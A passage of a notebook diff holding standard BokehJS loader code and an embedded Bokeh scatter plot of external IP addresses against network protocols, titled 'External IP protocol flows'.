+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1911\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1911\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"4ffdd16a-b8ab-427e-b773-724ce5826468\" data-root-id=\"1913\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"26e8a68e-c0db-4e9a-83c5-bb7403894e33\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"1924\"}],\"center\":[{\"id\":\"1926\"},{\"id\":\"1929\"}],\"height\":700,\"left\":[{\"id\":\"1927\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"1947\"}],\"title\":{\"id\":\"1914\"},\"toolbar\":{\"id\":\"1936\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"1916\"},\"x_scale\":{\"id\":\"1920\"},\"y_range\":{\"id\":\"1918\"},\"y_scale\":{\"id\":\"1922\"}},\"id\":\"1913\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"1930\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1934\",\"type\":\"SaveTool\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"90.130.70.73\",\"13.107.4.50\",\"173.194.61.40\",\"205.185.216.42\",\"216.58.218.238\",\"23.223.3.100\",\"23.3.13.106\",\"23.3.13.112\",\"23.3.13.146\",\"23.4.187.27\",\"23.45.180.121\",\"23.45.180.234\",\"23.48.36.47\",\"23.48.36.78\",\"40.80.145.38\",\"40.87.63.92\",\"72.21.81.240\",\"72.21.91.29\",\"8.249.241.254\",\"8.253.45.249\",\"99.84.106.178\",\"99.84.106.27\",\"99.84.106.92\",\"104.43.212.12\",\"13.64.188.245\",\"13.65.107.32\",\"13.67.143.117\",\"13.68.226.108\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.130\",\"13.74.179.117\",\"13.82.152.48\",\"13.83.148.218\",\"13.83.148.235\",\"13.83.149.5\",\"13.86.124.191\",\"13.89.187.212\",\"13.89.220.65\",\"134.170.58.123\",\"157.55.134.136\",\"157.55.134.142\",\"157.55.135.128\",\"168.62.32.212\",\"172.217.15.110\",\"172.217.15.78\",\"172.217.15.99\",\"172.217.8.14\",\"172.217.8.3\",\"20.38.98.100\",\"20.41.41.23\",\"20.42.24.50\",\"204.79.197.200\",\"212.13.197.231\",\"23.47.27.169\",\"23.96.64.84\",\"40.121.3.131\",\"40.124.45.19\",\"40.69.153.67\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.232.95\",\"40.79.85.125\",\"40.85.232.64\",\"40.91.75.5\",\"46.43.34.31\",\"52.165.170.112\",\"52.165.175.144\",\"52.173.26.181\",\"52.173.28.179\",\"52.183.114.173\",\"52.239.152.10\",\"65.52.108.92\",\"65.55.163.76\",\"65.55.163.78\",\"65.55.163.80\",\"65.55.252.190\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.200\",\"99.84.104.63\",\"10.0.3.4\",\"10.0.3.5\",\"131.107.147.209\",\"52.168.138.145\",\"52.179.17.38\",\"10.0.3.4\",\"10.0.3.5\",\"104.211.30.1\"],\"L7Protocol\":[\"ftp\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"microsoft-ds\",\"microsoft-ds\",\"ms-wbt-server\",\"ntp\",\"ntp\",\"ssh\",\"ssh\",\"ssh\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAA8D8AAAAAAIBIQAAAAAAAAABAAAAAAACARUAAAAAAAAAAQAAAAAAAgERAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAFEAAAAAAAAAAQAAAAAAAACRAAAAAAAAAAEAAAAAAAIBEQAAAAAAAAABAAAAAAAAAAEAAAAAAAIBNQAAAAAAAgElAAAAAAAAA8D8AAAAAAIBEQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAABxAAAAAAAAACEAAAAAAAIBaQAAAAAAAAD1AAAAAAAAAGEAAAAAAAIBAQAAAAAAAYH9AAAAAAADoh0AAAAAAAAAYQAAAAAAAACBAAAAAAAAAAEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAADFAAAAAAAAAFEAAAAAAAAAcQAAAAAAAAABAAAAAAAAA8D8AAAAAAAAgQAAAAAAAAABAAAAAAAAAFEAAAAAAAAAoQAAAAAAAAABAAAAAAAAAGEAAAAAAAIBCQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAsQAAAAAAAABBAAAAAAADgYEAAAAAAAAAAQAAAAAAAADhAAAAAAAAgYEAAAAAAAAAzQAAAAAAAACRAAAAAAAAAOEAAAAAAAAAAQAAAAAAAABRAAAAAAAAAPkAAAAAAAAAzQAAAAAAAAAhAAAAAAAAACEAAAAAAAADwPwAAAAAAACRAAAAAAAAALkAAAAAAAAAUQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAIQAAAAAAAIGBAAAAAAABAcEAAAAAAAAA2QAAAAAAAABxAAAAAAAAAIkAAAAAAAAAiQAAAAAAAADJAAAAAAABAXUAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAyQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[89]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88],\"plt_size\":{\"__ndarray__\":\"G3DFGnDFij/UKX/UKX/kPxtwxRpwxZo/Uqf8Uaf84T8bcMUacMWaP9F7JtF7JuE/EWa7EGa7wD8RZrsQZrvAPxFmuxBmu8A/EWa7EGa7sD8bcMUacMWaPxFmuxBmu8A/G3DFGnDFmj/ReybReybhPxtwxRpwxZo/G3DFGnDFmj9ZA65YA67oP1VVVVVVVeU/G3DFGnDFij/ReybReybhPxFmuxBmu8A/EWa7EGa7wD8RZrsQZrvAPxfCbBfCbLc/FBQUFBQUpD/WgCvWgCv2P5jtQpjtQtg/FBQUFBQUtD+cm5ubm5vbP+qUP+qUPxpAAAAAAAAAJEAUFBQUFBS0PxtwxRpwxbo/G3DFGnDFmj8bcMUacMWqPxtwxRpwxao/G3DFGnDFqj8bcMUacMWqPxzHcRzHccw/EWa7EGa7sD8XwmwXwmy3PxtwxRpwxZo/G3DFGnDFij8bcMUacMW6PxtwxRpwxZo/EWa7EGa7sD8UFBQUFBTEPxtwxRpwxZo/FBQUFBQUtD+fSfSeSfTePx4eHh4eHr4/G3DFGnDFij8UFBQUFBTEPxFmuxBmu7A/EWa7EGa7sD8XwmwXwmzHPxtwxRpwxao/PDw8PDw8/D8bcMUacMWaPxQUFBQUFNQ/+/r6+vr6+j8gdcofdcrPPxFmuxBmu8A/FBQUFBQU1D8bcMUacMWaPxFmuxBmu7A/GRkZGRkZ2T8gdcofdcrPPxQUFBQUFKQ/FBQUFBQUpD8bcMUacMWKPxFmuxBmu8A/GRkZGRkZyT8RZrsQZruwPx4eHh4eHr4/G3DFGnDFij8UFBQUFBSkP/v6+vr6+vo/24Uw24UwC0ASvWcSvWfSPxfCbBfCbLc/Hh4eHh4evj8eHh4eHh6+Px4eHh4eHs4/eHh4eHh4+D8bcMUacMWaPxtwxRpwxYo/G3DFGnDFij8eHh4eHh7OPw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[89]},\"size\":{\"__ndarray__\":\"AAAAAAAA8D8AAAAAAIBIQAAAAAAAAABAAAAAAACARUAAAAAAAAAAQAAAAAAAgERAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAFEAAAAAAAAAAQAAAAAAAACRAAAAAAAAAAEAAAAAAAIBEQAAAAAAAAABAAAAAAAAAAEAAAAAAAIBNQAAAAAAAgElAAAAAAAAA8D8AAAAAAIBEQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAABxAAAAAAAAACEAAAAAAAIBaQAAAAAAAAD1AAAAAAAAAGEAAAAAAAIBAQAAAAAAAYH9AAAAAAADoh0AAAAAAAAAYQAAAAAAAACBAAAAAAAAAAEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAADFAAAAAAAAAFEAAAAAAAAAcQAAAAAAAAABAAAAAAAAA8D8AAAAAAAAgQAAAAAAAAABAAAAAAAAAFEAAAAAAAAAoQAAAAAAAAABAAAAAAAAAGEAAAAAAAIBCQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAsQAAAAAAAABBAAAAAAADgYEAAAAAAAAAAQAAAAAAAADhAAAAAAAAgYEAAAAAAAAAzQAAAAAAAACRAAAAAAAAAOEAAAAAAAAAAQAAAAAAAABRAAAAAAAAAPkAAAAAAAAAzQAAAAAAAAAhAAAAAAAAACEAAAAAAAADwPwAAAAAAACRAAAAAAAAALkAAAAAAAAAUQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAIQAAAAAAAIGBAAAAAAABAcEAAAAAAAAA2QAAAAAAAABxAAAAAAAAAIkAAAAAAAAAiQAAAAAAAADJAAAAAAABAXUAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAyQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[89]}},\"selected\":{\"id\":\"1956\"},\"selection_policy\":{\"id\":\"1957\"}},\"id\":\"1912\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"overlay\":{\"id\":\"1935\"}},\"id\":\"1931\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1932\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1933\",\"type\":\"ResetTool\"},{\"attributes\":{\"data_source\":{\"id\":\"1912\"},\"glyph\":{\"id\":\"1945\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1946\"},\"view\":{\"id\":\"1948\"}},\"id\":\"1947\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"factors\":[\"ftp\",\"http\",\"https\",\"microsoft-ds\",\"ms-wbt-server\",\"ntp\",\"ssh\"]},\"id\":\"1916\",\"type\":\"FactorRange\"},{\"attributes\":{\"axis_label\":\"AllExtIPs\",\"axis_line_color\":null,\"formatter\":{\"id\":\"1951\"},\"major_label_policy\":{\"id\":\"1950\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"5pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"1928\"}},\"id\":\"1927\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"axis_label\":\"L7Protocol\",\"axis_line_color\":null,\"formatter\":{\"id\":\"1954\"},\"major_label_orientation\":1.5707963267948966,\"major_label_policy\":{\"id\":\"1953\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"11pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"1925\"}},\"id\":\"1924\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"axis\":{\"id\":\"1924\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1926\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1954\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{},\"id\":\"1922\",\"type\":\"CategoricalScale\"},{\"attributes\":{},\"id\":\"1950\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"1951\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{},\"id\":\"1957\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"axis\":{\"id\":\"1927\"},\"dimension\":1,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1929\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1925\",\"type\":\"CategoricalTicker\"},{\"attributes\":{},\"id\":\"1956\",\"type\":\"Selection\"},{\"attributes\":{\"text\":\"External IP protocol flows\",\"text_font_size\":\"15pt\"},\"id\":\"1914\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1928\",\"type\":\"CategoricalTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1930\"},{\"id\":\"1931\"},{\"id\":\"1932\"},{\"id\":\"1933\"},{\"id\":\"1934\"},{\"id\":\"1942\"}]},\"id\":\"1936\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1953\",\"type\":\"AllLabels\"},{\"attributes\":{\"factors\":[\"99.84.106.92\",\"99.84.106.27\",\"99.84.106.178\",\"99.84.104.63\",\"90.130.70.73\",\"8.253.45.249\",\"8.249.241.254\",\"72.21.91.29\",\"72.21.81.240\",\"72.21.81.200\",\"65.55.44.109\",\"65.55.44.108\",\"65.55.252.190\",\"65.55.163.80\",\"65.55.163.78\",\"65.55.163.76\",\"65.52.108.92\",\"52.239.152.10\",\"52.183.114.173\",\"52.179.17.38\",\"52.173.28.179\",\"52.173.26.181\",\"52.168.138.145\",\"52.165.175.144\",\"52.165.170.112\",\"46.43.34.31\",\"40.91.75.5\",\"40.87.63.92\",\"40.85.232.64\",\"40.80.145.38\",\"40.79.85.125\",\"40.77.232.95\",\"40.77.228.69\",\"40.77.226.250\",\"40.69.153.67\",\"40.124.45.19\",\"40.121.3.131\",\"23.96.64.84\",\"23.48.36.78\",\"23.48.36.47\",\"23.47.27.169\",\"23.45.180.234\",\"23.45.180.121\",\"23.4.187.27\",\"23.3.13.146\",\"23.3.13.112\",\"23.3.13.106\",\"23.223.3.100\",\"216.58.218.238\",\"212.13.197.231\",\"205.185.216.42\",\"204.79.197.200\",\"20.42.24.50\",\"20.41.41.23\",\"20.38.98.100\",\"173.194.61.40\",\"172.217.8.3\",\"172.217.8.14\",\"172.217.15.99\",\"172.217.15.78\",\"172.217.15.110\",\"168.62.32.212\",\"157.55.135.128\",\"157.55.134.142\",\"157.55.134.136\",\"134.170.58.123\",\"131.107.147.209\",\"13.89.220.65\",\"13.89.187.212\",\"13.86.124.191\",\"13.83.149.5\",\"13.83.148.235\",\"13.83.148.218\",\"13.82.152.48\",\"13.74.179.117\",\"13.71.172.130\",\"13.71.172.128\",\"13.68.93.109\",\"13.68.226.108\",\"13.67.143.117\",\"13.65.107.32\",\"13.64.188.245\",\"13.107.4.50\",\"104.43.212.12\",\"104.211.30.1\",\"10.0.3.5\",\"10.0.3.4\"]},\"id\":\"1918\",\"type\":\"FactorRange\"},{\"attributes\":{},\"id\":\"1920\",\"type\":\"CategoricalScale\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"red\"},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"L7Protocol\"},\"y\":{\"field\":\"AllExtIPs\"}},\"id\":\"1945\",\"type\":\"Circle\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1935\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"red\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"L7Protocol\"},\"y\":{\"field\":\"AllExtIPs\"}},\"id\":\"1946\",\"type\":\"Circle\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"L7Protocol\",\"@L7Protocol\"],[\"AllExtIPs\",\"@AllExtIPs\"],[\"value\",\"@size\"]]},\"id\":\"1942\",\"type\":\"HoverTool\"},{\"attributes\":{\"source\":{\"id\":\"1912\"}},\"id\":\"1948\",\"type\":\"CDSView\"}],\"root_ids\":[\"1913\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"26e8a68e-c0db-4e9a-83c5-bb7403894e33\",\"root_ids\":[\"1913\"],\"roots\":{\"1913\":\"4ffdd16a-b8ab-427e-b773-724ce5826468\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1913"
+      }
+     }
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "Figure(id='1913', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1913', <span id=\"2010\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[CategoricalAxis(id='1924', ...)],</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='1926', ...), Grid(id='1929', ...)],</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: 